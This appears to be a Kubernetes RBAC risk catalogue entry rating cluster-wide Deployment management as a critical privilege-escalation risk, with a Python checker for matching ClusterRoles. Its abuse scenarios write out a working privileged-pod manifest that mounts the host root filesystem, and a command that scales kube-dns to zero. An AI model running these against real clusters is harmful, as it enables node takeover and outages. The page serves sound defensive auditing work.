Manage Deployments cluster-wide (potential for privileged pod execution)
Elevation of Privilege
Critical
Overview
Field | Value |
---|---|
ID | 1033 |
Name | Manage Deployments cluster-wide (potential for privileged pod execution) |
Risk Category | Elevation of Privilege |
Risk Level | Critical |
Role Type | ClusterRole |
API Groups | apps |
Resources | deployments |
Verbs | create, update, patch, delete |
Tags | Persistence PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Allows creating, updating, or deleting Deployments across all namespaces. Deployments manage pod replicas, and this permission can be used to deploy pods with privileged settings, leading to code execution, privilege escalation, persistence, and tampering with cluster workloads.
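As an added example (not part of the original rule page), the Python below checks ClusterRole objects for the grant listed in the Overview table, treating the `*` wildcard in `apiGroups`, `resources` or `verbs` as a match. The sample input is constructed in the shape of `kubectl get clusterroles -o json`; the function names and role names are assumptions of this example.

```python
import json

# Fields of rule 1033, taken from the Overview table.
API_GROUP = "apps"
RESOURCE = "deployments"
RISKY_VERBS = {"create", "update", "patch", "delete"}


def _covers(granted, wanted):
    """True if an RBAC list names `wanted` or holds the '*' wildcard."""
    return "*" in granted or wanted in granted


def risky_verbs(rule):
    """Rule-1033 verbs that one PolicyRule grants on apps/deployments."""
    if not (_covers(rule.get("apiGroups", []), API_GROUP)
            and _covers(rule.get("resources", []), RESOURCE)):
        return set()
    verbs = set(rule.get("verbs", []))
    return set(RISKY_VERBS) if "*" in verbs else verbs & RISKY_VERBS


def find_matches(role_list):
    """Map ClusterRole name -> sorted risky verbs, for roles that match."""
    hits = {}
    for role in role_list.get("items", []):
        granted = set()
        for rule in role.get("rules") or []:
            granted |= risky_verbs(rule)
        if role.get("kind") == "ClusterRole" and granted:
            hits[role["metadata"]["name"]] = sorted(granted)
    return hits


# Constructed sample (hypothetical role names), not output from a real cluster.
SAMPLE = json.loads("""{"items": [
 {"kind": "ClusterRole", "metadata": {"name": "deploy-manager"}, "rules": [
   {"apiGroups": ["apps"], "resources": ["deployments"],
    "verbs": ["create", "update", "patch", "delete"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "wildcard-admin"}, "rules": [
   {"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "deploy-viewer"}, "rules": [
   {"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["get", "list"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "patch-only"}, "rules": [
   {"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["get", "patch"]}]}
]}""")

if __name__ == "__main__":
    print(json.dumps(find_matches(SAMPLE), indent=2))
```

A role is reported when it grants any one of the four verbs, so a role limited to `patch` is still flagged.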
Abuse Scenarios
- Create a new Deployment with a privileged pod template.

```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: privileged-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: privileged-app
  template:
    metadata:
      labels:
        app: privileged-app
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: attacker
        image: busybox
        command: ["/bin/sh", "-c", "sleep infinity"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```
- Scale a critical deployment to zero replicas, causing denial of service.

```bash
kubectl scale deployment <deployment-name> -n <namespace> --replicas=0
# Example: kubectl scale deployment kube-dns -n kube-system --replicas=0
```